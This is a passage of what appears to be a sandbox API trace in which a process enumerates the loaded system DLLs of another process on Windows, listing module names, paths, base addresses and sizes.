[0055.887] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x77610000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="USER32.dll") returned 0xa [0055.888] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x77610000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\USER32.dll" (normalized: "c:\\windows\\system32\\user32.dll")) returned 0x1e [0055.888] GetModuleInformation (in: hProcess=0x21c, hModule=0x7feff350000, lpmodinfo=0x26a7bf0, cb=0x18 | out: lpmodinfo=0x26a7bf0*(lpBaseOfDll=0x7feff350000, SizeOfImage=0xe000, EntryPoint=0x7feff351080)) returned 1 [0055.889] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7feff350000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="LPK.dll") returned 0x7 [0055.890] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7feff350000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\LPK.dll" (normalized: "c:\\windows\\system32\\lpk.dll")) returned 0x1b [0055.891] GetModuleInformation (in: hProcess=0x21c, hModule=0x7feff690000, lpmodinfo=0x26a9da0, cb=0x18 | out: lpmodinfo=0x26a9da0*(lpBaseOfDll=0x7feff690000, SizeOfImage=0xc9000, EntryPoint=0x7feff70a874)) returned 1 [0055.892] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7feff690000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="USP10.dll") returned 0x9 [0055.893] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7feff690000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\USP10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")) returned 0x1d [0055.893] GetModuleInformation (in: hProcess=0x21c, hModule=0x7feff400000, lpmodinfo=0x26abf60, cb=0x18 | out: lpmodinfo=0x26abf60*(lpBaseOfDll=0x7feff400000, SizeOfImage=0x2e000, EntryPoint=0x7feff401010)) returned 1 [0055.894] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7feff400000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="IMM32.DLL") returned 0x9 [0055.895] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7feff400000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\IMM32.DLL" (normalized: "c:\\windows\\system32\\imm32.dll")) returned 0x1d [0055.896] GetModuleInformation (in: hProcess=0x21c, hModule=0x7feff9d0000, lpmodinfo=0x26ae120, cb=0x18 | out: lpmodinfo=0x26ae120*(lpBaseOfDll=0x7feff9d0000, SizeOfImage=0x109000, EntryPoint=0x7feff9d1064)) returned 1 [0055.897] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7feff9d0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="MSCTF.dll") returned 0x9 [0055.898] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7feff9d0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\MSCTF.dll" (normalized: "c:\\windows\\system32\\msctf.dll")) returned 0x1d [0055.899] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefd670000, lpmodinfo=0x26b02e0, cb=0x18 | out: lpmodinfo=0x26b02e0*(lpBaseOfDll=0x7fefd670000, SizeOfImage=0xf000, EntryPoint=0x7fefd671010)) returned 1 [0055.900] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefd670000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="CRYPTBASE.dll") returned 0xd [0055.901] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefd670000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CRYPTBASE.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")) returned 0x21 [0055.902] GetModuleInformation (in: hProcess=0x21c, hModule=0x7feff430000, lpmodinfo=0x26b24c8, cb=0x18 | out: lpmodinfo=0x26b24c8*(lpBaseOfDll=0x7feff430000, SizeOfImage=0xdb000, EntryPoint=0x7feff450760)) returned 1 [0055.903] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7feff430000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="ADVAPI32.dll") returned 0xc [0055.904] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7feff430000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ADVAPI32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")) returned 0x20 [0055.905] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefa8a0000, lpmodinfo=0x26b4698, cb=0x18 | out: lpmodinfo=0x26b4698*(lpBaseOfDll=0x7fefa8a0000, SizeOfImage=0xb0000, EntryPoint=0x7fefa8b28b0)) returned 1 [0055.906] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefa8a0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="bfe.dll") returned 0x7 [0055.907] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefa8a0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\bfe.dll" (normalized: "c:\\windows\\system32\\bfe.dll")) returned 0x1b [0055.908] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefd260000, lpmodinfo=0x26b6960, cb=0x18 | out: lpmodinfo=0x26b6960*(lpBaseOfDll=0x7fefd260000, SizeOfImage=0x2f000, EntryPoint=0x7fefd261064)) returned 1 [0055.909] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefd260000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="AUTHZ.dll") returned 0x9 [0055.910] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefd260000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\AUTHZ.dll" (normalized: "c:\\windows\\system32\\authz.dll")) returned 0x1d [0055.911] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefb320000, lpmodinfo=0x26b8b20, cb=0x18 | out: lpmodinfo=0x26b8b20*(lpBaseOfDll=0x7fefb320000, SizeOfImage=0xb000, EntryPoint=0x7fefb324f8c)) returned 1 [0055.912] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefb320000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="slc.dll") returned 0x7 [0055.914] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefb320000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll")) returned 0x1b [0055.916] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefd640000, lpmodinfo=0x26bacd0, cb=0x18 | out: lpmodinfo=0x26bacd0*(lpBaseOfDll=0x7fefd640000, SizeOfImage=0x25000, EntryPoint=0x7fefd649658)) returned 1 [0055.917] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefd640000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="SspiCli.dll") returned 0xb [0055.918] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefd640000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SspiCli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")) returned 0x1f [0055.919] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefcc80000, lpmodinfo=0x26bce90, cb=0x18 | out: lpmodinfo=0x26bce90*(lpBaseOfDll=0x7fefcc80000, SizeOfImage=0xd000, EntryPoint=0x7fefcc81348)) returned 1 [0055.921] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefcc80000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="pcwum.dll") returned 0x9 [0055.924] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefcc80000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\pcwum.dll" (normalized: "c:\\windows\\system32\\pcwum.dll")) returned 0x1d [0055.926] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefd760000, lpmodinfo=0x24c6418, cb=0x18 | out: lpmodinfo=0x24c6418*(lpBaseOfDll=0x7fefd760000, SizeOfImage=0x14000, EntryPoint=0x7fefd7610e0)) returned 1 [0055.927] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefd760000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="RpcRtRemote.dll") returned 0xf [0055.929] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefd760000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll")) returned 0x23 [0055.930] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefa760000, lpmodinfo=0x24c85e8, cb=0x18 | out: lpmodinfo=0x24c85e8*(lpBaseOfDll=0x7fefa760000, SizeOfImage=0xce000, EntryPoint=0x7fefa761e18)) returned 1 [0055.931] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefa760000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="mpssvc.dll") returned 0xa [0055.933] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefa760000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\mpssvc.dll" (normalized: "c:\\windows\\system32\\mpssvc.dll")) returned 0x1e [0055.934] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefc950000, lpmodinfo=0x24ca7a8, cb=0x18 | out: lpmodinfo=0x24ca7a8*(lpBaseOfDll=0x7fefc950000, SizeOfImage=0xbb000, EntryPoint=0x7fefc956de0)) returned 1 [0055.935] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefc950000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="FirewallAPI.dll") returned 0xf [0055.937] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefc950000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll")) returned 0x23 [0055.938] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefc940000, lpmodinfo=0x24cc978, cb=0x18 | out: lpmodinfo=0x24cc978*(lpBaseOfDll=0x7fefc940000, SizeOfImage=0xc000, EntryPoint=0x7fefc941064)) returned 1 [0055.939] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefc940000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="VERSION.dll") returned 0xb [0055.941] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefc940000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\VERSION.dll" (normalized: "c:\\windows\\system32\\version.dll")) returned 0x1f [0055.942] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefac50000, lpmodinfo=0x24ceb38, cb=0x18 | out: lpmodinfo=0x24ceb38*(lpBaseOfDll=0x7fefac50000, SizeOfImage=0x53000, EntryPoint=0x7fefac52b98)) returned 1 [0055.944] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefac50000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="fwpuclnt.dll") returned 0xc [0055.946] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefac50000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\fwpuclnt.dll" (normalized: "c:\\windows\\system32\\fwpuclnt.dll")) returned 0x20 [0055.947] GetModuleInformation (in: hProcess=0x21c, hModule=0x7feff9c0000, lpmodinfo=0x24d0d08, cb=0x18 | out: lpmodinfo=0x24d0d08*(lpBaseOfDll=0x7feff9c0000, SizeOfImage=0x8000, EntryPoint=0x7feff9c1504)) returned 1 [0055.949] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7feff9c0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="NSI.dll") returned 0x7 [0055.950] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7feff9c0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\NSI.dll" (normalized: "c:\\windows\\system32\\nsi.dll")) returned 0x1b [0055.952] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefd9a0000, lpmodinfo=0x24d2eb8, cb=0x18 | out: lpmodinfo=0x24d2eb8*(lpBaseOfDll=0x7fefd9a0000, SizeOfImage=0x36000, EntryPoint=0x7fefd9a1474)) returned 1 [0055.953] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefd9a0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="CFGMGR32.dll") returned 0xc [0055.955] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefd9a0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CFGMGR32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")) returned 0x20 [0055.956] GetModuleInformation (in: hProcess=0x21c, hModule=0x7feff2d0000, lpmodinfo=0x24d5088, cb=0x18 | out: lpmodinfo=0x24d5088*(lpBaseOfDll=0x7feff2d0000, SizeOfImage=0x71000, EntryPoint=0x7feff2e1e20)) returned 1 [0055.958] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7feff2d0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="SHLWAPI.dll") returned 0xb [0055.960] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7feff2d0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SHLWAPI.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")) returned 0x1f [0055.961] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefd610000, lpmodinfo=0x24d7248, cb=0x18 | out: lpmodinfo=0x24d7248*(lpBaseOfDll=0x7fefd610000, SizeOfImage=0xb000, EntryPoint=0x7fefd611030)) returned 1 [0055.963] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefd610000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="secur32.dll") returned 0xb [0055.965] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefd610000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll")) returned 0x1f [0055.966] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefcc70000, lpmodinfo=0x24d9420, cb=0x18 | out: lpmodinfo=0x24d9420*(lpBaseOfDll=0x7fefcc70000, SizeOfImage=0xa000, EntryPoint=0x7fefcc73cb8)) returned 1 [0055.968] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefcc70000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="credssp.dll") returned 0xb [0055.970] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefcc70000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll")) returned 0x1f [0055.971] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefcb20000, lpmodinfo=0x24db5e0, cb=0x18 | out: lpmodinfo=0x24db5e0*(lpBaseOfDll=0x7fefcb20000, SizeOfImage=0x1e000, EntryPoint=0x7fefcb213b8)) returned 1 [0055.973] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefcb20000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="USERENV.dll") returned 0xb [0055.975] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefcb20000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\USERENV.dll" (normalized: "c:\\windows\\system32\\userenv.dll")) returned 0x1f [0055.977] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefd780000, lpmodinfo=0x24dd7a0, cb=0x18 | out: lpmodinfo=0x24dd7a0*(lpBaseOfDll=0x7fefd780000, SizeOfImage=0xf000, EntryPoint=0x7fefd7819b0)) returned 1 [0055.979] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefd780000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="profapi.dll") returned 0xb [0055.980] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefd780000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")) returned 0x1f [0055.982] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefcb00000, lpmodinfo=0x24dfb78, cb=0x18 | out: lpmodinfo=0x24dfb78*(lpBaseOfDll=0x7fefcb00000, SizeOfImage=0x1b000, EntryPoint=0x7fefcb02068)) returned 1 [0055.984] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefcb00000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="GPAPI.dll") returned 0x9 [0055.986] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefcb00000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\GPAPI.dll" (normalized: "c:\\windows\\system32\\gpapi.dll")) returned 0x1d [0055.988] GetModuleInformation (in: hProcess=0x21c, hModule=0x7feff970000, lpmodinfo=0x24e1d38, cb=0x18 | out: lpmodinfo=0x24e1d38*(lpBaseOfDll=0x7feff970000, SizeOfImage=0x4d000, EntryPoint=0x7feff971070)) returned 1 [0055.990] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7feff970000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="WS2_32.dll") returned 0xa [0055.992] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7feff970000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WS2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")) returned 0x1e [0055.994] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefb270000, lpmodinfo=0x24e3ef8, cb=0x18 | out: lpmodinfo=0x24e3ef8*(lpBaseOfDll=0x7fefb270000, SizeOfImage=0x27000, EntryPoint=0x7fefb2798bc)) returned 1 [0055.996] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefb270000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="IPHLPAPI.DLL") returned 0xc [0055.998] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefb270000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll")) returned 0x20 [0056.000] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefb260000, lpmodinfo=0x24e60c8, cb=0x18 | out: lpmodinfo=0x24e60c8*(lpBaseOfDll=0x7fefb260000, SizeOfImage=0xb000, EntryPoint=0x7fefb261198)) returned 1 [0056.002] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefb260000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="WINNSI.DLL") returned 0xa [0056.004] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefb260000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WINNSI.DLL" (normalized: "c:\\windows\\system32\\winnsi.dll")) returned 0x1e [0056.006] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefac20000, lpmodinfo=0x24e8288, cb=0x18 | out: lpmodinfo=0x24e8288*(lpBaseOfDll=0x7fefac20000, SizeOfImage=0x11000, EntryPoint=0x7fefac216ac)) returned 1 [0056.008] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefac20000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="dhcpcsvc6.DLL") returned 0xd [0056.010] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefac20000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\dhcpcsvc6.DLL" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll")) returned 0x21 [0056.013] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefac00000, lpmodinfo=0x24ea458, cb=0x18 | out: lpmodinfo=0x24ea458*(lpBaseOfDll=0x7fefac00000, SizeOfImage=0x18000, EntryPoint=0x7fefac01bf8)) returned 1 [0056.015] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefac00000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="dhcpcsvc.DLL") returned 0xc [0056.017] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefac00000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\dhcpcsvc.DLL" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll")) returned 0x20 [0056.019] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefd010000, lpmodinfo=0x24ec628, cb=0x18 | out: lpmodinfo=0x24ec628*(lpBaseOfDll=0x7fefd010000, SizeOfImage=0x55000, EntryPoint=0x7fefd011054)) returned 1 [0056.021] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefd010000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="mswsock.dll") returned 0xb [0056.023] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefd010000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll")) returned 0x1f [0056.025] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefca10000, lpmodinfo=0x24ee7e8, cb=0x18 | out: lpmodinfo=0x24ee7e8*(lpBaseOfDll=0x7fefca10000, SizeOfImage=0x7000, EntryPoint=0x7fefca114b0)) returned 1 [0056.028] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefca10000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wshtcpip.dll") returned 0xc [0056.030] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefca10000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\wshtcpip.dll" (normalized: "c:\\windows\\system32\\wshtcpip.dll")) returned 0x20 [0056.032] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefd000000, lpmodinfo=0x24f09b8, cb=0x18 | out: lpmodinfo=0x24f09b8*(lpBaseOfDll=0x7fefd000000, SizeOfImage=0x7000, EntryPoint=0x7fefd00142c)) returned 1 [0056.034] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefd000000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wship6.dll") returned 0xa [0056.036] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefd000000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll")) returned 0x1e [0056.040] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefa5c0000, lpmodinfo=0x24f2b78, cb=0x18 | out: lpmodinfo=0x24f2b78*(lpBaseOfDll=0x7fefa5c0000, SizeOfImage=0xa000, EntryPoint=0x7fefa5c3dd4)) returned 1 [0056.042] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefa5c0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wfapigp.dll") returned 0xb [0056.045] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefa5c0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wfapigp.dll" (normalized: "c:\\windows\\system32\\wfapigp.dll")) returned 0x1f [0056.047] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefa350000, lpmodinfo=0x24f4d38, cb=0x18 | out: lpmodinfo=0x24f4d38*(lpBaseOfDll=0x7fefa350000, SizeOfImage=0x2c000, EntryPoint=0x7fefa3556f8)) returned 1 [0056.049] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefa350000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="dps.dll") returned 0x7 [0056.052] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefa350000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\dps.dll" (normalized: "c:\\windows\\system32\\dps.dll")) returned 0x1b [0056.054] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefdf90000, lpmodinfo=0x24f6ee8, cb=0x18 | out: lpmodinfo=0x24f6ee8*(lpBaseOfDll=0x7fefdf90000, SizeOfImage=0xd7000, EntryPoint=0x7fefdf93274)) returned 1 [0056.057] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefdf90000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="OLEAUT32.dll") returned 0xc [0056.060] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefdf90000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\OLEAUT32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")) returned 0x20 [0056.062] GetModuleInformation (in: hProcess=0x21c, hModule=0x7feff360000, lpmodinfo=0x24f90b8, cb=0x18 | out: lpmodinfo=0x24f90b8*(lpBaseOfDll=0x7feff360000, SizeOfImage=0x99000, EntryPoint=0x7feff361c10)) returned 1 [0056.064] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7feff360000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="CLBCatQ.DLL") returned 0xb [0056.067] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7feff360000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CLBCatQ.DLL" (normalized: "c:\\windows\\system32\\clbcatq.dll")) returned 0x1f [0056.070] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefb4e0000, lpmodinfo=0x24fb278, cb=0x18 | out: lpmodinfo=0x24fb278*(lpBaseOfDll=0x7fefb4e0000, SizeOfImage=0x127000, EntryPoint=0x7fefb4e10ec)) returned 1 [0056.072] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefb4e0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="taskschd.dll") returned 0xc [0056.075] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefb4e0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll")) returned 0x20 [0056.077] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefb800000, lpmodinfo=0x24fd460, cb=0x18 | out: lpmodinfo=0x24fd460*(lpBaseOfDll=0x7fefb800000, SizeOfImage=0x2d000, EntryPoint=0x7fefb801010)) returned 1 [0056.079] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefb800000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="ntmarta.dll") returned 0xb [0056.082] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefb800000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")) returned 0x1f [0056.085] GetModuleInformation (in: hProcess=0x21c, hModule=0x7feffae0000, lpmodinfo=0x24ff620, cb=0x18 | out: lpmodinfo=0x24ff620*(lpBaseOfDll=0x7feffae0000, SizeOfImage=0x52000, EntryPoint=0x7feffae10d4)) returned 1 [0056.087] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7feffae0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="WLDAP32.dll") returned 0xb [0056.090] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7feffae0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WLDAP32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll")) returned 0x1f [0056.092] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefa1b0000, lpmodinfo=0x25017e0, cb=0x18 | out: lpmodinfo=0x25017e0*(lpBaseOfDll=0x7fefa1b0000, SizeOfImage=0x19000, EntryPoint=0x7fefa1b2b50)) returned 1 [0056.095] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefa1b0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wdi.dll") returned 0x7 [0056.098] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefa1b0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wdi.dll" (normalized: "c:\\windows\\system32\\wdi.dll")) returned 0x1b [0056.101] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefa5e0000, lpmodinfo=0x2503990, cb=0x18 | out: lpmodinfo=0x2503990*(lpBaseOfDll=0x7fefa5e0000, SizeOfImage=0x14a000, EntryPoint=0x7fefa5e1100)) returned 1 [0056.103] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefa5e0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="diagperf.dll") returned 0xc [0056.106] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefa5e0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\diagperf.dll" (normalized: "c:\\windows\\system32\\diagperf.dll")) returned 0x20 [0056.109] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fef92c0000, lpmodinfo=0x2505b60, cb=0x18 | out: lpmodinfo=0x2505b60*(lpBaseOfDll=0x7fef92c0000, SizeOfImage=0x8000, EntryPoint=0x7fef92c22f8)) returned 1 [0056.111] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fef92c0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="pnpts.dll") returned 0x9 [0056.114] GetModuleFileNameExW 